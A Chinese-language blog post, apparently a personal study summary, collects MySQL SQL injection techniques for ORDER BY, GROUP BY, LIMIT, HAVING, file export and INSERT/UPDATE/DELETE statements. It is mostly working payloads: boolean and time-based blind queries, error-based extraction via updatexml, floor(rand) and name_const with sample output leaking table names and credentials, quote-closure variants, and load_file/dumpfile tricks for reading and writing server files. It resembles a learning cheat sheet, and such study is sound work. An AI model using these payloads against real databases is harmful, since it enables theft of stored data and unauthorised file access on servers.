sql注入小结

 

 

select的注入:

1 SELECT
2     [ALL | DISTINCT | DISTINCTROW ]
3       [HIGH_PRIORITY]
4       [STRAIGHT_JOIN]
5       [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
6       [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
7     select_expr [, select_expr ...]
8     [FROM table_references
9     [WHERE where_condition]
10     [GROUP BY {col_name | expr | position}
11       [ASC | DESC], ... [WITH ROLLUP]]
12     [HAVING where_condition]
13     [ORDER BY {col_name | expr | position}
14       [ASC | DESC], ...]
15     [LIMIT {[offset,] row_count | row_count OFFSET offset}]
16     [PROCEDURE procedure_name(argument_list)]
17     [INTO OUTFILE 'file_name' export_options
18       | INTO DUMPFILE 'file_name'
19       | INTO var_name [, var_name]]
20     [FOR UPDATE | LOCK IN SHARE MODE]]

注入类型:
order by inject
group by inject
Limit x inject
1、前有order by
2、前无order by
having inject(类似于where,区别在于where字句在聚合前先筛选记录,而having是聚合后筛选)
into [out|dump]file inject

(一、order by注入)
法一:if判断
猜数据库名
order by 1,if((ord(substr(database(),1,1))>115),1,(select 1 from information_schema.tables));
如果>115为false,>114为ture则,第一个字符是a

猜表名
order by 1,if(ord(substr((select GROUP_CONCA(DISTINCT table_name) from information_schema.columns where table_schema=0x7374756479),1,1))>1,1,(select 1 from information_schema.tables));

案例参考:http://www.wooyun.org/bugs/wooyun-2013-028321

法二:case函数
order by 1,(select case when(2<1) then 1 else 1*(select username from uc_members)end)=1;返回错误
order by 1,(select case when(2>1) then 1 else 1*(select username from uc_members)end)=1;返回正常

参考:http://www.oldjun.com/blog/index.php/archives/62/
看不懂上面的,本地测试了这个:
select * from users where id < 5 order by 1,(select case when((ord(substr(database(),1,1))>114)) then 1 else (select 1 from information_schema.tables)end);

(二、group by注入)
和where后一样,直接报错注入
1、group by id and 1=2 union select 1;
2、select * from users group by name and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1);

(三、Limit x注入)
limit后面可以跟两个函数,PROCEDURE 和 INTO
1、前有order by
报错注入: select * from users order by name limit 3 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1);
其中rand()为随机函数,extractvalue(长度限制,最长32位)读取xml文件,用于报错.类似报错还有updatexml等等

基于时间注入: select * from users order by name limit 3 PROCEDURE analyse(updatexml(1,if(ord(substr(database(),1,1))>114,BENCHMARK(5000000,md5(1)),null),1),1);

select * from users order by name limit 3 PROCEDURE analyse(updatexml(1,concat(0x7c,if (1=1,BENCHMARK(5000000,md5(1)),null),0x7c),1),1);

PS:要注意爆错函数里面的字段数。

参考:http://zone.wooyun.org/content/18220

2、前无order by
select * from users limit 3 union select 1,database(),3;

(四、having inject)
和where差不多
select * from users having 1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1);

(五、into [out|dump]file)
导入或者读取文件
outfile 能导出多行,但会转义,不适合二进制文件导出
dumpfile 只能导出一行,但是适合二进制文件导出

create table a (cmd LONGBLOB);
insert into a (cmd) values (hex(load_file(‘c:\\1.aspx’)));
select unhex(cmd) from a; //可读取文件内容
select unhex(cmd) from a into dumpfile ‘c:\\2.aspx'; //导出文件

(六、insert、update、delete注入)
1、updatexml()函数
测试payload:(ps:extractvalue()同样的也可以用来获取数据)
or updatexml(1,concat(0x7e,(version())),0) or

INSERT INTO users (id, username, password) VALUES (2,’Olivia’ or updatexml(1,concat(0x7e,(version())),0) or”, ‘Nervo’);

获取数据payload:
or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or

update、insert、delete语句可以获取到数据库表名、列名

整个流程::
查询数据库名:
update user1 set username=’Make’ or updatexml(0,concat(0x7e,(select distinct table_schema from information_schema.tables limit 1,1)),0) or’ ‘;
ERROR 1105 (HY000): XPATH syntax error: ‘~alictf’
联合查询爆表:
update user1 set username=’Make’ or updatexml(0,concat(0x7e,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)),0) or’ ‘;
ERROR 1105 (HY000): XPATH syntax error: ‘~#admin’
查询数据:
mysql> update user1 set username=’Make’ or updatexml(0,concat(0x7e,(select name from users limit 0,1)),0) or’ ‘;
ERROR 1105 (HY000): XPATH syntax error: ‘~user1′

2、子查询
这样的查询update不能获取当前表的数据,但是可以利用floor报错子查询来获取:
获取数据库名:
UPDATE users SET password=’Nicky’ or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or” WHERE id=2 and username=’Nervo';
ERROR 1062 (23000): Duplicate entry ‘~’study’~1′ for key ‘group_key’
获取表名:
UPDATE users SET password=’Nicky’ or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(table_name as char),0x27,0x7e)) FROM information_schema.tables where table_schema=’study’ limit 1,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or” WHERE id=2 and username=’Nervo';
ERROR 1062 (23000): Duplicate entry ‘~’a’~1′ for key ‘group_key’
获取数据:
UPDATE users SET password=’Nicky’ or (SELECT 1 FROM(SELECT count(*),concat((SELECT(SELECT concat(0x7e,0x27,cast(username as char),0x27,0x7e)) FROM study.user1 limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or” WHERE id=2 and username=’Nervo';
ERROR 1062 (23000): Duplicate entry ‘~’M’~1′ for key ‘group_key’

3、name_const函数
name_const()函数是MYSQL5.0.12版本加入的一个返回给定值的函数。当用来产生一个结果集合列时 , NAME_CONST() 促使该列使用给定名称
Payload:
or (SELECT * FROM (SELECT(name_const(version(),1)),name_const(version(),1))a) or

测试是否能获取数据
INSERT INTO users (id, username, password) VALUES (1,’Olivia’ or (SELECT*FROM(SELECT name_const((SELECT 2),1),name_const((SELECT 2),1))a) or ”, ‘Nervo’);
如果显示ERROR 1210 (HY000): Incorrect arguments to NAME_CONST,就不行
如果显示ERROR 1060 (42S21): Duplicate column name ‘2’,就可以进一步获取更多数据。

获取表名
INSERT INTO users (id, username, password) VALUES (1,’Olivia’ or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1),name_const(( SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 1,1),1))a) or ”, ‘Nervo’);
ERROR 1060 (42S21): Duplicate column name ‘users’
获取列名
INSERT INTO users (id, username, password) VALUES (1,’Olivia’ or (SELECT*FROM(SELECT name_const((SELECT column_name FROM information_schema.columns WHERE table_name=’users’ limit 0,1),1),name_const(( SELECT column_name FROM information_schema.columns WHERE table_name=’users’ limit 0,1),1))a) or ”, ‘Nervo’);
ERROR 1060 (42S21): Duplicate column name ‘id’
获取数据
INSERT INTO users (id, username, password) VALUES (2,’Olivia’ or (SELECT*FROM(SELECT name_const((SELECT concat_ws(0x7e,id, username, password) FROM users limit 0,1),1),name_const(( SELECT concat_ws(0x7e,id, username, password) FROM users limit0,1),1))a) or ”, ‘Nervo’);
ERROR 1060 (42S21): Duplicate column name ‘1~Jane~Eyre’

闭合变种:

‘ or (payload) or ‘
‘ and (payload) and ‘
‘ or (payload) and ‘
‘ or (payload) and ‘=’
‘* (payload) *’
‘ or (payload) and ‘
” – (payload) – ”


order by 排序查询,默认按升序排序,加上desc就是反序,order by 加字段不需要添加”

group by 分组查询,将表中数据相同的为一组.

 

函数:
current_user()

BENCHMARK(1000000,ENCODE(‘hello’,’goodbye’)); 延迟5s执行后面的语句
sleep(time); 延迟某秒时间执行,用于if里面实现时间盲注

CASE value WHEN [compare-value] THEN result [WHEN [compare-value] THEN result …] [ELSE result] END CASE WHEN [condition] THEN result [WHEN [condition] THEN result …] [ELSE result] END

进制转化函数:
ord() 将其转化为ascii
ASCII(str)
BIN(N) 返回以二进制表示的字符串
OCT(N) 返回以八进制表示的字符串
HEX(N) 返回以十六进制表示的字符串
CONV(N,10,16) 将字符串以10进制转化为16进制
SHA1(1) 加密
md5()

substr(string string,num start,num length) 字符串的截取
类似函数还有mid(),substring()

ord(substr(database(),1,1))

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: